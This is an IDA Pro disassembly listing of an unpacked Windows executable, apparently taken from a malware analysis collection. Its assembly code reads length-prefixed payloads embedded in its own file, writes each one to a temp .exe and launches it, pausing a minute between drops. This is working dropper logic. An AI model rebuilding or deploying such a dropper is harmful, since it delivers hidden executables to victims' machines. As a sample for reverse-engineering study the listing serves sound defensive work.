;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 67EE97424238A7A07460565D26E36BDF
; File Name : u:\work\67ee97424238a7a07460565d26e36bdf_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000250 ( 592.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00000200
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: start+C6�p
Dst = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
lea eax, [ebp+Dst]
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
lea esi, [esi+ebx]
push 4 ; Size
push esi ; Src
push eax ; Dst
call memcpy ; memcpy
mov eax, [ebp+Dst]
mov esp, ebp
pop ebp
retn 8
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
push 81h ; nSize
push offset FileName ; lpFilename
push eax ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
test eax, eax
jz loc_4011DC
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 1 ; dwDesiredAccess
push offset FileName ; lpFileName
call CreateFileA ; CreateFileA
cmp eax, 0FFFFFFFFh
jz loc_4011DC
mov hFile, eax
push 0 ; lpFileSizeHigh
push hFile ; hFile
call GetFileSize ; GetFileSize
cmp eax, 0FFFFFFFFh
jz loc_4011D1
mov dword_402275, eax
push 0 ; lpName
push 0 ; dwMaximumSizeLow
push 0 ; dwMaximumSizeHigh
push 2 ; flProtect
push 0 ; lpFileMappingAttributes
push hFile ; hFile
call CreateFileMappingA ; CreateFileMappingA
test eax, eax
jz loc_4011D1
mov hFileMappingObject, eax
push 0 ; dwNumberOfBytesToMap
push 0 ; dwFileOffsetLow
push 0 ; dwFileOffsetHigh
push 4 ; dwDesiredAccess
push hFileMappingObject ; hFileMappingObject
call MapViewOfFile ; MapViewOfFile
test eax, eax
jz loc_4011C6
mov lpBaseAddress, eax
push offset PathName ; lpBuffer
push 104h ; nBufferLength
call GetTempPathA ; GetTempPathA
test eax, eax
jz loc_4011C6
sub dword_402275, 4
loc_4010DE: ; CODE XREF: start+192�j
push lpBaseAddress
push dword_402004
call sub_401000
mov nNumberOfBytesToWrite, eax
push offset String ; lpTempFileName
push 0 ; uUnique
push offset PrefixString ; "exe"
push offset PathName ; lpPathName
call GetTempFileNameA ; GetTempFileNameA
push offset String ; lpFileName
call DeleteFileA ; DeleteFileA
push offset String ; lpString
call lstrlenA ; lstrlenA
mov esi, offset String
lea esi, [esi+eax]
mov dword ptr [esi-4], 6578652Eh
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 2 ; dwShareMode
push 2 ; dwDesiredAccess
push offset String ; lpFileName
call CreateFileA ; CreateFileA
test eax, eax
jz short loc_40118B
mov hObject, eax
mov esi, lpBaseAddress
add esi, dword_402004
add esi, 4
push 0 ; lpOverlapped
push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
push esi ; lpBuffer
push eax ; hFile
call WriteFile ; WriteFile
push hObject ; hObject
call CloseHandle ; CloseHandle
push 0
push offset String
push 1
call _spawnl ; _spawnl
loc_40118B: ; CODE XREF: start+124�j
mov ebx, nNumberOfBytesToWrite
add dword_402004, ebx
add dword_402004, 4
mov ecx, dword_402275
cmp dword_402004, ecx
jge short loc_4011BB
push 0EA60h ; dwMilliseconds
call Sleep ; Sleep
jmp loc_4010DE
; ---------------------------------------------------------------------------
loc_4011BB: ; CODE XREF: start+186�j
push lpBaseAddress ; lpBaseAddress
call UnmapViewOfFile ; UnmapViewOfFile
loc_4011C6: ; CODE XREF: start+91�j start+AD�j
push hFileMappingObject ; hObject
call CloseHandle ; CloseHandle
loc_4011D1: ; CODE XREF: start+4F�j start+71�j
push hFile ; hObject
call CloseHandle ; CloseHandle
loc_4011DC: ; CODE XREF: start+12�j start+34�j
push 0 ; uExitCode
call ExitProcess ; ExitProcess
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileSize. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileMappingA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION MapViewOfFile. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTempPathA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTempFileNameA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION DeleteFileA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION lstrlenA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WriteFile. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION UnmapViewOfFile. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _spawnl. PRESS KEYPAD "+" TO EXPAND]
align 200h
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000004A0 ( 1184.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00000600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 402000h
; char PrefixString[]
PrefixString db 'exe',0 ; DATA XREF: start+D7�o
dword_402004 dd 800h ; DATA XREF: start+C0�r start+131�r ...
align 10h
dd 204Ch, 2 dup(0)
dd 21B4h, 2094h, 2088h, 2 dup(0)
dd 21D6h, 20D0h, 5 dup(0)
dd 20DCh, 20F2h, 2100h, 210Eh, 2124h, 2134h, 2144h, 2158h
dd 2166h, 2172h, 217Eh, 218Ch, 2194h, 21A6h, 0
dd 21C2h, 21CCh, 0
_data ends
;
; Imports from kernel32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn __imp_GetModuleFileNameA:dword ; DATA XREF: GetModuleFileNameA�r
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn __imp_CreateFileA:dword ; DATA XREF: CreateFileA�r
; DWORD __stdcall GetFileSize(HANDLE hFile,LPDWORD lpFileSizeHigh)
extrn __imp_GetFileSize:dword ; DATA XREF: GetFileSize�r
; HANDLE __stdcall CreateFileMappingA(HANDLE hFile,LPSECURITY_ATTRIBUTES lpFileMappingAttributes,DWORD flProtect,DWORD dwMaximumSizeHigh,DWORD dwMaximumSizeLow,LPCSTR lpName)
extrn __imp_CreateFileMappingA:dword ; DATA XREF: CreateFileMappingA�r
; LPVOID __stdcall MapViewOfFile(HANDLE hFileMappingObject,DWORD dwDesiredAccess,DWORD dwFileOffsetHigh,DWORD dwFileOffsetLow,SIZE_T dwNumberOfBytesToMap)
extrn __imp_MapViewOfFile:dword ; DATA XREF: MapViewOfFile�r
; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
extrn __imp_GetTempPathA:dword ; DATA XREF: GetTempPathA�r
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName,LPCSTR lpPrefixString,UINT uUnique,LPSTR lpTempFileName)
extrn __imp_GetTempFileNameA:dword ; DATA XREF: GetTempFileNameA�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn __imp_DeleteFileA:dword ; DATA XREF: DeleteFileA�r
; int __stdcall lstrlenA(LPCSTR lpString)
extrn __imp_lstrlenA:dword ; DATA XREF: lstrlenA�r
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn __imp_WriteFile:dword ; DATA XREF: WriteFile�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn __imp_Sleep:dword ; DATA XREF: Sleep�r
; BOOL __stdcall UnmapViewOfFile(LPCVOID lpBaseAddress)
extrn __imp_UnmapViewOfFile:dword ; DATA XREF: UnmapViewOfFile�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess�r
;
; Imports from msvcrt.dll
;
; void *__cdecl memcpy(void *Dst,const void *Src,size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpy�r
extrn __imp__spawnl:dword ; DATA XREF: _spawnl�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 4020DCh
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatefilea db 'CreateFileA',0
dd 65470000h, 6C694674h, 7A695365h, 65h, 61657243h, 69466574h
dd 614D656Ch, 6E697070h, 4167h, 614D0000h, 65695670h, 46664F77h
dd 656C69h, 65470000h, 6D655474h, 74615070h, 4168h, 65470000h
dd 6D655474h, 6C694670h, 6D614E65h, 4165h, 65440000h, 6574656Ch
dd 656C6946h, 41h, 7274736Ch, 416E656Ch, 0
aWritefile db 'WriteFile',0
align 10h
aClosehandle db 'CloseHandle',0
dd 6C530000h, 706565h, 6E550000h, 5670616Dh, 4F776569h
dd 6C694666h, 65h, 74697845h, 636F7250h, 737365h, 6E72656Bh
dd 32336C65h, 6C6C642Eh, 0
aMemcpy db 'memcpy',0
align 4
dd 735F0000h, 6E776170h, 736D006Ch, 74726376h, 6C6C642Eh
dd 4 dup(0)
; char FileName[]
FileName db 10h dup(0) ; DATA XREF: start+5�o start+27�o
dd 1Ch dup(?)
db ?
; HANDLE hFile
hFile dd ? ; DATA XREF: start+3A�w start+41�r ...
dword_402275 dd ? ; DATA XREF: start+55�w start+B3�w ...
; HANDLE hFileMappingObject
hFileMappingObject dd ? ; DATA XREF: start+77�w start+84�r ...
; LPCVOID lpBaseAddress
lpBaseAddress dd ? ; DATA XREF: start+97�w
; start:loc_4010DE�r ...
; DWORD nNumberOfBytesToWrite
nNumberOfBytesToWrite dd ? ; DATA XREF: start+CB�w start+141�r ...
; HANDLE hObject
hObject dd ? ; DATA XREF: start+126�w start+14E�r
; char String[]
String db 105h dup(?) ; DATA XREF: start+D0�o start+E6�o ...
; char PathName[]
PathName db 105h dup(?) ; DATA XREF: start+9C�o start+DC�o
; DWORD NumberOfBytesWritten
NumberOfBytesWritten dd ? ; DATA XREF: start+13C�o
align 10h
_data ends
end start